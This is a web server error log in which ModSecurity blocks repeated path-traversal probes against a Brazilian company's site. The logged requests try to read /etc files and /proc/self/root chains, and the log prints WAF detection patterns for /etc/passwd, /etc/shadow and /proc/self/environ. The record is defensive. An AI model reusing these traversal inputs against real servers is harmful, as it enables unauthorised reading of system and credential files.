[Fri Mar 20 11:51:25.707416 2026] [:error] [pid 11642:tid 140411716749056] [client 57.141.18.113:32906] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1e7bninkcc-iUj5AqNrgAAA4M"]
[Fri Mar 20 11:51:37.517490 2026] [mime_magic:error] [pid 26799:tid 140411716749056] (70014)End of file found: [client 57.141.18.29:32972] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:52:01.781784 2026] [mime_magic:error] [pid 11642:tid 140411607643904] (70014)End of file found: [client 57.141.18.86:34796] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:52:08.771644 2026] [:error] [pid 11167:tid 140411674785536] [client 57.141.18.16:35246] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1fGPHIg5MgXLBnicMnPgAAAcg"]
[Fri Mar 20 11:52:10.541854 2026] [mime_magic:error] [pid 31215:tid 140411632822016] (70014)End of file found: [client 216.73.216.191:35306] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:52:11.022997 2026] [:error] [pid 31215:tid 140411666392832] [client 57.141.18.63:35390] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1fGwF0L0L-SsrnPo6a9QAAAsk"]
[Fri Mar 20 11:52:56.034239 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:42710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1fSPXLqtnMIWvjpaLOpAAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Fri Mar 20 11:53:28.042175 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.243.128:45834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1faPqxLDW4GITHUkQc_QAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 11:53:41.971595 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.71:39664] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1fdeoXxyEfFpUF8f-x8gAAAVU"]
[Fri Mar 20 11:53:42.734092 2026] [mime_magic:error] [pid 11167:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:39776] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:53:47.031980 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.111:40010] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1feta6ubjKNq_cu4YO0AAAA0U"]
[Fri Mar 20 11:53:50.045775 2026] [mime_magic:error] [pid 7893:tid 140411607643904] (70014)End of file found: [client 57.141.18.85:40198] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:54:01.028220 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.243.128:46222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1fifXLqtnMIWvjpaLPEQAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:54:29.802645 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.243.128:54564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1fpbninkcc-iUj5AqOggAAA44"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 11:54:34.515569 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.228.61:38378] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1fqta6ubjKNq_cu4YO6wAAA0I"]
[Fri Mar 20 11:55:01.679822 2026] [:error] [pid 21219:tid 140411725141760] [client 57.141.18.101:43334] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1fxfXLqtnMIWvjpaLPPwAAAoI"]
[Fri Mar 20 11:55:04.958664 2026] [mime_magic:error] [pid 9818:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:43488] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:55:11.900905 2026] [:error] [pid 21219:tid 140411649607424] [client 57.141.18.107:43794] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1fz_XLqtnMIWvjpaLPTQAAAos"]
[Fri Mar 20 11:55:29.107438 2026] [:error] [pid 10189:tid 140411540502272] [client 57.141.18.82:44804] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1f4TJ3M9BSuKP7CAZbtwAAAJg"]
[Fri Mar 20 11:55:29.348740 2026] [:error] [pid 10189:tid 140411741927168] [client 57.141.18.21:44806] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1f4TJ3M9BSuKP7CAZbuAAAAIA"]
[Fri Mar 20 11:55:33.164151 2026] [mime_magic:error] [pid 9818:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:44986] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:55:34.563763 2026] [:error] [pid 11642:tid 140411548894976] [client 57.141.18.10:45108] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1f5rninkcc-iUj5AqO-wAAA5c"]
[Fri Mar 20 11:55:45.384691 2026] [mime_magic:error] [pid 11642:tid 140411641214720] (70014)End of file found: [client 57.141.18.28:45810] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:55:49.488611 2026] [:error] [pid 31215:tid 140411565680384] [client 57.141.18.14:46024] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1f9QF0L0L-SsrnPo6bkwAAAtU"]
[Fri Mar 20 11:55:53.831455 2026] [:error] [pid 7893:tid 140411683178240] [client 57.141.18.72:46326] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1f-RCii7xarUs8iHadfAAAAgc"]
[Fri Mar 20 11:56:00.231805 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.56:46684] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1gAPXLqtnMIWvjpaLPagAAApA"]
[Fri Mar 20 11:56:41.587726 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.43:49220] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1gKNa6ubjKNq_cu4YPcQAAA0U"]
[Fri Mar 20 11:56:49.863507 2026] [:error] [pid 11167:tid 140411741927168] [client 57.141.18.81:49826] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1gMfHIg5MgXLBnicMoMAAAAcA"]
[Fri Mar 20 11:56:51.395539 2026] [:error] [pid 11642:tid 140411716749056] [client 57.141.18.47:49918] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1gM7ninkcc-iUj5AqPegAAA4M"]
[Fri Mar 20 11:57:16.436156 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.5:50754] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1gTOoXxyEfFpUF8f-yxwAAAVE"]
[Fri Mar 20 11:57:26.692528 2026] [mime_magic:error] [pid 9818:tid 140411557287680] (70014)End of file found: [client 74.7.243.128:51514] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run
[Fri Mar 20 11:57:33.312870 2026] [mime_magic:error] [pid 11642:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:51268] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:57:40.663313 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.243.128:37864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1gZF1pVZ5mVmJwsFNhbgAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:57:46.016530 2026] [:error] [pid 10189:tid 140411565680384] [client 57.141.18.1:51952] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1gajJ3M9BSuKP7CAZcXwAAAJU"]
[Fri Mar 20 11:57:46.059898 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.20:52224] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1gavXLqtnMIWvjpaLQGwAAAoQ"]
